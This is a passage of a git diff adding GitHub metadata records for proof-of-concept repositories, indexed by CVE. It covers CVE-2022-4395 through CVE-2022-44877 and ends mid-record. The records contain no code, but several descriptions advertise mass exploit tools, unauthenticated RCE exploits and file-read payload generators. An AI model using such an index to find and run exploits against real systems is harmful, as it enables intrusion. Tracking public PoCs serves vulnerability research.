+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4395.json b/2022/CVE-2022-4395.json
new file mode 100644
index 0000000000..36b6130c82
--- /dev/null
+++ b/2022/CVE-2022-4395.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 611731156,
+ "name": "CVE-2022-4395",
+ "full_name": "MrG3P5\/CVE-2022-4395",
+ "owner": {
+ "login": "MrG3P5",
+ "id": 57594747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57594747?v=4",
+ "html_url": "https:\/\/github.com\/MrG3P5"
+ },
+ "html_url": "https:\/\/github.com\/MrG3P5\/CVE-2022-4395",
+ "description": "Mass Auto Exploit CVE-2022-4395 Unauthenticated Arbitrary File Upload",
+ "fork": false,
+ "created_at": "2023-03-09T12:35:48Z",
+ "updated_at": "2024-02-21T18:34:48Z",
+ "pushed_at": "2023-03-09T12:46:45Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-43980.json b/2022/CVE-2022-43980.json
new file mode 100644
index 0000000000..8299ef6a24
--- /dev/null
+++ b/2022/CVE-2022-43980.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 602645546,
+ "name": "CVE-2022-43980",
+ "full_name": "Argonx21\/CVE-2022-43980",
+ "owner": {
+ "login": "Argonx21",
+ "id": 30073895,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4",
+ "html_url": "https:\/\/github.com\/Argonx21"
+ },
+ "html_url": "https:\/\/github.com\/Argonx21\/CVE-2022-43980",
+ "description": "Stored Cross Site Scripting Vulnerability in the network maps edit functionality",
+ "fork": false,
+ "created_at": "2023-02-16T16:42:12Z",
+ "updated_at": "2023-02-16T16:42:12Z",
+ "pushed_at": "2023-02-16T17:03:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44118.json b/2022/CVE-2022-44118.json
new file mode 100644
index 0000000000..b38c79d0b9
--- /dev/null
+++ b/2022/CVE-2022-44118.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 600342998,
+ "name": "CVE-2022-44118-Exploit",
+ "full_name": "Athishpranav2003\/CVE-2022-44118-Exploit",
+ "owner": {
+ "login": "Athishpranav2003",
+ "id": 105591739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105591739?v=4",
+ "html_url": "https:\/\/github.com\/Athishpranav2003"
+ },
+ "html_url": "https:\/\/github.com\/Athishpranav2003\/CVE-2022-44118-Exploit",
+ "description": "PoC Exploit for RCE vulnerability in DedeCMS v6.1.9",
+ "fork": false,
+ "created_at": "2023-02-11T07:29:08Z",
+ "updated_at": "2023-02-11T07:30:47Z",
+ "pushed_at": "2023-07-04T07:17:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44136.json b/2022/CVE-2022-44136.json
new file mode 100644
index 0000000000..3001b81af9
--- /dev/null
+++ b/2022/CVE-2022-44136.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 653887200,
+ "name": "CVE-2022-44136-exploit",
+ "full_name": "IgorDuino\/CVE-2022-44136-exploit",
+ "owner": {
+ "login": "IgorDuino",
+ "id": 74809945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74809945?v=4",
+ "html_url": "https:\/\/github.com\/IgorDuino"
+ },
+ "html_url": "https:\/\/github.com\/IgorDuino\/CVE-2022-44136-exploit",
+ "description": "Exploit for CVE-2022-44136 for chcking security of your site",
+ "fork": false,
+ "created_at": "2023-06-15T00:52:11Z",
+ "updated_at": "2023-06-15T00:52:11Z",
+ "pushed_at": "2023-06-15T00:52:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44149.json b/2022/CVE-2022-44149.json
new file mode 100644
index 0000000000..20be05ed94
--- /dev/null
+++ b/2022/CVE-2022-44149.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 586048910,
+ "name": "CVE-2022-44149",
+ "full_name": "yerodin\/CVE-2022-44149",
+ "owner": {
+ "login": "yerodin",
+ "id": 9205071,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4",
+ "html_url": "https:\/\/github.com\/yerodin"
+ },
+ "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-44149",
+ "description": "POC Exploit for CVE-2022-44149",
+ "fork": false,
+ "created_at": "2023-01-06T20:00:25Z",
+ "updated_at": "2023-01-07T17:03:57Z",
+ "pushed_at": "2023-01-25T03:08:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44268.json b/2022/CVE-2022-44268.json
index 797829705c..f922ca50cf 100644
--- a/2022/CVE-2022-44268.json
+++ b/2022/CVE-2022-44268.json
@@ -1,4 +1,94 @@
[
+ {
+ "id": 596623131,
+ "name": "CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC",
+ "full_name": "duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC",
+ "owner": {
+ "login": "duc-nt",
+ "id": 61867814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61867814?v=4",
+ "html_url": "https:\/\/github.com\/duc-nt"
+ },
+ "html_url": "https:\/\/github.com\/duc-nt\/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC",
+ "description": "CVE-2022-44268 ImageMagick Arbitrary File Read - Payload Generator",
+ "fork": false,
+ "created_at": "2023-02-02T15:34:28Z",
+ "updated_at": "2024-06-24T02:53:12Z",
+ "pushed_at": "2023-02-02T16:53:37Z",
+ "stargazers_count": 268,
+ "watchers_count": 268,
+ "has_discussions": false,
+ "forks_count": 40,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 40,
+ "watchers": 268,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 596917149,
+ "name": "CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment",
+ "full_name": "y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment",
+ "owner": {
+ "login": "y1nglamore",
+ "id": 46070281,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46070281?v=4",
+ "html_url": "https:\/\/github.com\/y1nglamore"
+ },
+ "html_url": "https:\/\/github.com\/y1nglamore\/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment",
+ "description": "The vulnerable recurrence docker environment for CVE-2022-44268",
+ "fork": false,
+ "created_at": "2023-02-03T08:02:28Z",
+ "updated_at": "2023-05-30T06:56:16Z",
+ "pushed_at": "2023-02-03T08:03:19Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 597160092,
+ "name": "cve-2022-44268",
+ "full_name": "agathanon\/cve-2022-44268",
+ "owner": {
+ "login": "agathanon",
+ "id": 88989307,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88989307?v=4",
+ "html_url": "https:\/\/github.com\/agathanon"
+ },
+ "html_url": "https:\/\/github.com\/agathanon\/cve-2022-44268",
+ "description": "Payload generator and extractor for CVE-2022-44268 written in Python.",
+ "fork": false,
+ "created_at": "2023-02-03T19:02:27Z",
+ "updated_at": "2023-11-07T11:34:49Z",
+ "pushed_at": "2023-02-03T21:19:31Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 597257490,
"name": "cve-2022-44268-detector",
@@ -32,6 +122,96 @@
"score": 0,
"subscribers_count": 3
},
+ {
+ "id": 597283448,
+ "name": "CVE-2022-44268-automated-poc",
+ "full_name": "Ashifcoder\/CVE-2022-44268-automated-poc",
+ "owner": {
+ "login": "Ashifcoder",
+ "id": 46344066,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46344066?v=4",
+ "html_url": "https:\/\/github.com\/Ashifcoder"
+ },
+ "html_url": "https:\/\/github.com\/Ashifcoder\/CVE-2022-44268-automated-poc",
+ "description": "An information disclosure vulnerability that could be exploited to read arbitrary files from a server when parsing an image in Image Magic.",
+ "fork": false,
+ "created_at": "2023-02-04T03:50:07Z",
+ "updated_at": "2024-03-01T08:40:03Z",
+ "pushed_at": "2023-02-04T03:50:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 597372793,
+ "name": "CVE-2022-44268-PoC",
+ "full_name": "Baikuya\/CVE-2022-44268-PoC",
+ "owner": {
+ "login": "Baikuya",
+ "id": 52155445,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52155445?v=4",
+ "html_url": "https:\/\/github.com\/Baikuya"
+ },
+ "html_url": "https:\/\/github.com\/Baikuya\/CVE-2022-44268-PoC",
+ "description": "CVE-2022-44268 PoC",
+ "fork": false,
+ "created_at": "2023-02-04T10:50:20Z",
+ "updated_at": "2023-07-16T11:02:28Z",
+ "pushed_at": "2023-02-04T11:01:43Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 597824177,
+ "name": "CVE-2022-44268",
+ "full_name": "voidz0r\/CVE-2022-44268",
+ "owner": {
+ "login": "voidz0r",
+ "id": 1032286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1032286?v=4",
+ "html_url": "https:\/\/github.com\/voidz0r"
+ },
+ "html_url": "https:\/\/github.com\/voidz0r\/CVE-2022-44268",
+ "description": "A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read",
+ "fork": false,
+ "created_at": "2023-02-05T18:42:27Z",
+ "updated_at": "2024-06-24T01:07:16Z",
+ "pushed_at": "2023-02-05T19:35:03Z",
+ "stargazers_count": 213,
+ "watchers_count": 213,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 213,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 598074036,
"name": "imagemagick-lfi-poc",
@@ -66,6 +246,36 @@
"score": 0,
"subscribers_count": 0
},
+ {
+ "id": 598074392,
+ "name": "imagemagick-CVE-2022-44268",
+ "full_name": "Vulnmachines\/imagemagick-CVE-2022-44268",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/imagemagick-CVE-2022-44268",
+ "description": "Imagemagick CVE-2022-44268",
+ "fork": false,
+ "created_at": "2023-02-06T10:45:42Z",
+ "updated_at": "2023-03-24T09:36:29Z",
+ "pushed_at": "2023-02-06T10:51:45Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 600932755,
"name": "CVE-2022-44268",
@@ -109,6 +319,156 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 604397718,
+ "name": "heroku-CVE-2022-44268-reproduction",
+ "full_name": "nfm\/heroku-CVE-2022-44268-reproduction",
+ "owner": {
+ "login": "nfm",
+ "id": 127960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127960?v=4",
+ "html_url": "https:\/\/github.com\/nfm"
+ },
+ "html_url": "https:\/\/github.com\/nfm\/heroku-CVE-2022-44268-reproduction",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-21T01:15:07Z",
+ "updated_at": "2023-02-21T02:02:09Z",
+ "pushed_at": "2023-02-21T04:03:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 617667621,
+ "name": "POC-CVE-2022-44268",
+ "full_name": "betillogalvanfbc\/POC-CVE-2022-44268",
+ "owner": {
+ "login": "betillogalvanfbc",
+ "id": 45644724,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45644724?v=4",
+ "html_url": "https:\/\/github.com\/betillogalvanfbc"
+ },
+ "html_url": "https:\/\/github.com\/betillogalvanfbc\/POC-CVE-2022-44268",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-22T21:26:20Z",
+ "updated_at": "2023-03-23T05:43:33Z",
+ "pushed_at": "2023-03-22T21:26:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 658471431,
+ "name": "CVE-2022-44268-MagiLeak",
+ "full_name": "adhikara13\/CVE-2022-44268-MagiLeak",
+ "owner": {
+ "login": "adhikara13",
+ "id": 44716348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4",
+ "html_url": "https:\/\/github.com\/adhikara13"
+ },
+ "html_url": "https:\/\/github.com\/adhikara13\/CVE-2022-44268-MagiLeak",
+ "description": "Tools for working with ImageMagick to handle arbitrary file read vulnerabilities. Generate, read, and apply profile information to PNG files using a command-line interface.",
+ "fork": false,
+ "created_at": "2023-06-25T20:52:57Z",
+ "updated_at": "2023-06-27T09:57:01Z",
+ "pushed_at": "2023-06-26T18:16:50Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 661387078,
+ "name": "CVE-2022-44268-Exploit",
+ "full_name": "bhavikmalhotra\/CVE-2022-44268-Exploit",
+ "owner": {
+ "login": "bhavikmalhotra",
+ "id": 65305368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65305368?v=4",
+ "html_url": "https:\/\/github.com\/bhavikmalhotra"
+ },
+ "html_url": "https:\/\/github.com\/bhavikmalhotra\/CVE-2022-44268-Exploit",
+ "description": "Expoit for CVE-2022-44268",
+ "fork": false,
+ "created_at": "2023-07-02T17:24:00Z",
+ "updated_at": "2023-07-02T18:46:00Z",
+ "pushed_at": "2023-07-02T17:28:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 661819238,
+ "name": "CVE-2022-44268",
+ "full_name": "entr0pie\/CVE-2022-44268",
+ "owner": {
+ "login": "entr0pie",
+ "id": 73120825,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73120825?v=4",
+ "html_url": "https:\/\/github.com\/entr0pie"
+ },
+ "html_url": "https:\/\/github.com\/entr0pie\/CVE-2022-44268",
+ "description": "PoC of Imagemagick's Arbitrary File Read",
+ "fork": false,
+ "created_at": "2023-07-03T18:13:44Z",
+ "updated_at": "2024-05-09T13:17:28Z",
+ "pushed_at": "2023-07-03T18:34:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 666508345,
"name": "cve-2022-44268",
diff --git a/2022/CVE-2022-44276.json b/2022/CVE-2022-44276.json
new file mode 100644
index 0000000000..0abfe12abd
--- /dev/null
+++ b/2022/CVE-2022-44276.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 658104709,
+ "name": "CVE-2022-44276-PoC",
+ "full_name": "HerrLeStrate\/CVE-2022-44276-PoC",
+ "owner": {
+ "login": "HerrLeStrate",
+ "id": 26091132,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26091132?v=4",
+ "html_url": "https:\/\/github.com\/HerrLeStrate"
+ },
+ "html_url": "https:\/\/github.com\/HerrLeStrate\/CVE-2022-44276-PoC",
+ "description": "PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE",
+ "fork": false,
+ "created_at": "2023-06-24T19:28:44Z",
+ "updated_at": "2023-06-24T19:28:44Z",
+ "pushed_at": "2023-06-25T09:19:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44311.json b/2022/CVE-2022-44311.json
new file mode 100644
index 0000000000..d3333f28c2
--- /dev/null
+++ b/2022/CVE-2022-44311.json
@@ -0,0 +1,67 @@
+[
+ {
+ "id": 595851923,
+ "name": "CVE-2022-44311",
+ "full_name": "Halcy0nic\/CVE-2022-44311",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44311",
+ "description": "Proof of concept for CVE-2022-44311",
+ "fork": false,
+ "created_at": "2023-01-31T23:53:39Z",
+ "updated_at": "2023-01-31T23:53:39Z",
+ "pushed_at": "2023-02-01T00:32:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 603938610,
+ "name": "CVE-2022-44311",
+ "full_name": "DesmondSanctity\/CVE-2022-44311",
+ "owner": {
+ "login": "DesmondSanctity",
+ "id": 51109125,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4",
+ "html_url": "https:\/\/github.com\/DesmondSanctity"
+ },
+ "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-44311",
+ "description": "Out-Of-Bounds Read in html2xhtml : CVE-2022-44311",
+ "fork": false,
+ "created_at": "2023-02-20T01:28:04Z",
+ "updated_at": "2023-03-17T15:48:31Z",
+ "pushed_at": "2023-02-21T01:55:23Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "advisory",
+ "security",
+ "vulnerabilities",
+ "vulnerability-assessment"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44318.json b/2022/CVE-2022-44318.json
new file mode 100644
index 0000000000..0816be8538
--- /dev/null
+++ b/2022/CVE-2022-44318.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595867993,
+ "name": "CVE-2022-44318",
+ "full_name": "Halcy0nic\/CVE-2022-44318",
+ "owner": {
+ "login": "Halcy0nic",
+ "id": 42481692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4",
+ "html_url": "https:\/\/github.com\/Halcy0nic"
+ },
+ "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44318",
+ "description": "Proof of concept for CVE-2022-44318",
+ "fork": false,
+ "created_at": "2023-02-01T01:00:33Z",
+ "updated_at": "2023-02-01T01:01:43Z",
+ "pushed_at": "2023-02-01T01:13:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44666.json b/2022/CVE-2022-44666.json
new file mode 100644
index 0000000000..c521b7c67d
--- /dev/null
+++ b/2022/CVE-2022-44666.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 602207436,
+ "name": "CVE-2022-44666",
+ "full_name": "j00sean\/CVE-2022-44666",
+ "owner": {
+ "login": "j00sean",
+ "id": 22483317,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22483317?v=4",
+ "html_url": "https:\/\/github.com\/j00sean"
+ },
+ "html_url": "https:\/\/github.com\/j00sean\/CVE-2022-44666",
+ "description": "Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape, which was not fully fixed as CVE-2022-44666 in the patches released on December, 2022.",
+ "fork": false,
+ "created_at": "2023-02-15T18:12:04Z",
+ "updated_at": "2024-06-21T00:10:48Z",
+ "pushed_at": "2023-06-18T21:10:39Z",
+ "stargazers_count": 152,
+ "watchers_count": 152,
+ "has_discussions": false,
+ "forks_count": 25,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 25,
+ "watchers": 152,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-44877.json b/2022/CVE-2022-44877.json
index 5708eb8b00..2e109a58f5 100644
--- a/2022/CVE-2022-44877.json
+++ b/2022/CVE-2022-44877.json
@@ -1,4 +1,124 @@
[
+ {
+ "id": 585639540,
+ "name": "CVE-2022-44877",
+ "full_name": "numanturle\/CVE-2022-44877",
+ "owner": {
+ "login": "numanturle",
+ "id": 7007951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4",
+ "html_url": "https:\/\/github.com\/numanturle"
+ },
+ "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-44877",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-05T17:29:10Z",
+ "updated_at": "2024-05-10T10:48:31Z",
+ "pushed_at": "2023-01-05T17:40:18Z",
+ "stargazers_count": 101,
+ "watchers_count": 101,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 101,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 585996269,
+ "name": "CVE-2022-44877-RCE",
+ "full_name": "komomon\/CVE-2022-44877-RCE",
+ "owner": {
+ "login": "komomon",
+ "id": 52700174,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4",
+ "html_url": "https:\/\/github.com\/komomon"
+ },
+ "html_url": "https:\/\/github.com\/komomon\/CVE-2022-44877-RCE",
+ "description": "CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-01-06T16:53:51Z",
+ "updated_at": "2023-12-21T10:22:09Z",
+ "pushed_at": "2023-01-06T17:00:09Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 596515870,
+ "name": "CVE-2022-44877-CWP7",
+ "full_name": "ColdFusionX\/CVE-2022-44877-CWP7",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-44877-CWP7",
+ "description": "Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) (Unauthenticated)",
+ "fork": false,
+ "created_at": "2023-02-02T11:00:32Z",
+ "updated_at": "2023-02-08T03:17:49Z",
+ "pushed_at": "2023-02-02T11:01:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 600549630,
+ "name": "CVE-2022-44877",
+ "full_name": "Chocapikk\/CVE-2022-44877",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-44877",
+ "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)",
+ "fork": false,
+ "created_at": "2023-02-11T20:45:08Z",
+ "updated_at": "2023-12-19T11:45:18Z",
+ "pushed_at": "2023-02-11T22:03:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 602139288,
"name": "CVE-2022-44877-white-box",
@@ -34,6 +154,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 609469987,
+ "name": "CVE-2022-44877-LAB",
+ "full_name": "RicYaben\/CVE-2022-44877-LAB",
+ "owner": {
+ "login": "RicYaben",
+ "id": 32867697,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32867697?v=4",
+ "html_url": "https:\/\/github.com\/RicYaben"
+ },
+ "html_url": "https:\/\/github.com\/RicYaben\/CVE-2022-44877-LAB",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-03-04T09:15:46Z",
+ "updated_at": "2023-03-11T20:49:36Z",
+ "pushed_at": "2023-03-13T08:32:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 619926011,
+ "name": "CVE-2022-44877",
+ "full_name": "dkstar11q\/CVE-2022-44877",
+ "owner": {
+ "login": "dkstar11q",
